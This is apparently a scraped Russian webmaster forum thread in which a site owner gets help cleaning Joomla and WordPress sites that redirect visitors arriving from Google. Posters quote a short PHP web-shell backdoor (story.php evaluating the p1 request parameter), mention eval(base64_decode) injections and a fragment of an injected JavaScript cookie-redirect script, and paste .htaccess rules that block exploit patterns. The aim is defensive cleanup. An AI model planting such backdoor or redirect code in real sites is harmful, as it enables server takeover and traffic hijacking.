specc

Рейтинг
168
Регистрация
08.09.2009
Вирус на сайте, с гугла переправляет на сторонние сайты
WebGomel:
Правильно. Во всех php файлах у вас дописан код типа eval(base64_decode... Если его расшифровать, то это и есть код редиректа.
Дописывается эта гадость через шелл или бэкдор, залитый на любой из сайтов на аккаунте.
Хотите быстро найти его - смотрите логи запросов к сайтам. Найти легко - к этому файлу будут запросы POST, а не GET.
То что вы перезалили джумлу - ничего не значит, шелл там уже мог быть/он мог быть не в джумле/у хостера криво настроен сервер - вариантов масса, но без логов всё это просто догадки.

HTTP логи?

Чистим сайты от вирусов, рекомендации, проверка сервера на уязвимость!

тоже написал в личку

Вирус на сайте, с гугла переправляет на сторонние сайты
specc:
щас посмотрю

---------- Добавлено 17.01.2013 в 20:48 ----------



я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.

---------- Добавлено 17.01.2013 в 20:49 ----------


по фтп файлы не открывает касперский пишет что троян

JCE не стоит

---------- Добавлено 17.01.2013 в 21:01 ----------

marsh:
После того как годичной давности залили обновили до последней версии?

обновил до 1.5.26, боюсь если поставить последнюю версию могут измениться урлы

---------- Добавлено 17.01.2013 в 21:08 ----------

olleggatoor:
ну так к себе скачайте на комп и сравните, а Каспера думаю знаете как отключить.

зачем качать, если и так ясно что файлы заражены, я писал что удалял и заливал все заново, какое то время все хорошо, потом опять все заражено.

---------- Добавлено 17.01.2013 в 21:19 ----------

Nayteri:
У меня как-то заразился сайт клинета, правда всего оилн ищза всю практику, пришло кака кидиотке вручяную силдить перебирать усе .js скипты которые были в сайте и в конце каждого удалть код function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+... прятногт мало, ноговолрят есть скирпт, я правда никаким языками не владею, но он есть. короче я чустила вручную, часов 15-20 так точно ушло.
(тоже была joomla правла ренее где-то 1.5.23 или около того, короче даже гугл выдлавал типа "заходлить опасно все дела" почиститила все .jsб обновила до последней 1.5.26 плюс напиcfла хостеру , чтобызапретил доступ по фтп вроде полет нормальный - гугл с яндесом смилостивились вернули сайт в поиск без предупреждений).

была джумла 1.5.23 обновил до 1.5.26

Вирус на сайте, с гугла переправляет на сторонние сайты
marsh:
Компонент JCE стоит в joomla? В папке /images/stories/ есть файл story.php с кодом: 
<?php 

if (isset($_REQUEST['p1'])) {

   eval(stripslashes($_REQUEST['p1']));

} else {

   echo "djeu84m";

}

?>

щас посмотрю

---------- Добавлено 17.01.2013 в 20:48 ----------

olleggatoor:
мой совет, не поленитесь скачать с фтп весь движок и сравнить с оригиналом, есть специальные проги, а пароль менять смысла нету если ето гомно там.

я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.

---------- Добавлено 17.01.2013 в 20:49 ----------

fellowes:
Проверьте php файлики на предмет вредоносного кода, типа eval(base64_decode...
Тут скрипт есть для проверки, думаю поможет Вам. Вот статья по теме на хабре.

по фтп файлы не открывает касперский пишет что троян

Вирус на сайте, с гугла переправляет на сторонние сайты

тоже думаю хостинг, а в базах данных может быть? Базы то старые остались

Вирус на сайте, с гугла переправляет на сторонние сайты
olleggatoor:
.htaccess проверте

---------- Добавлено 17.01.2013 в 20:10 ----------

Если движок ДЛЕ скиньте мне main.tpl от вашего шаблона

джумла и ворд пресс

вот .htaccess джула

## If you experience problems on your site block out the operations listed below

## This attempts to block the most common type of exploit `attempts` to Joomla!

#

# Block out any script trying to set a mosConfig value through the URL

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode crap to send via URL

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]

# Block out any script that includes a <script> tag in URL

RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Send all blocked request to homepage with 403 Forbidden error!

RewriteRule ^(.*)$ /index.php [F,L]

#

Сайты на Joomla лежат. Вредоносный код.

Может кто подскажет, есть сайты на джумла 1.5, если смотреть страницы с гугла то они переправляют на сторонние сайты. Подскажите как убрать эту гадость, хостинг говорит что помочь не может. Вчера удалил все файлы движков со всех доменов, залил годичной давности и обновил джумлу до 1.5.26, посмотрел все нормально открывается переправлений с гугла небыло. Только что посмотрел, с гугла опять идет переход на сторонние сайты. При открытии php файлов касперский удаляет Trojan.PHP.Agent.cp

Вирус на сайте, с гугла переправляет на сторонние сайты
olleggatoor:
Комп свои проверьте

проверил касперским, все чисто. Еще замечаю в мазиле в текстовых документах выводятся ссылки www, 2012 при наведении выскакивает банер - Пари матч

Бегун совсем трататухи попутал

да забудьте ваш бегун, из него все давно убежали!!!

Украина - получение чеков за все месяца (общий топик) - часть 3

до сих пор чека нет - киев

1... 353637383940414243 ...68
Всего: 677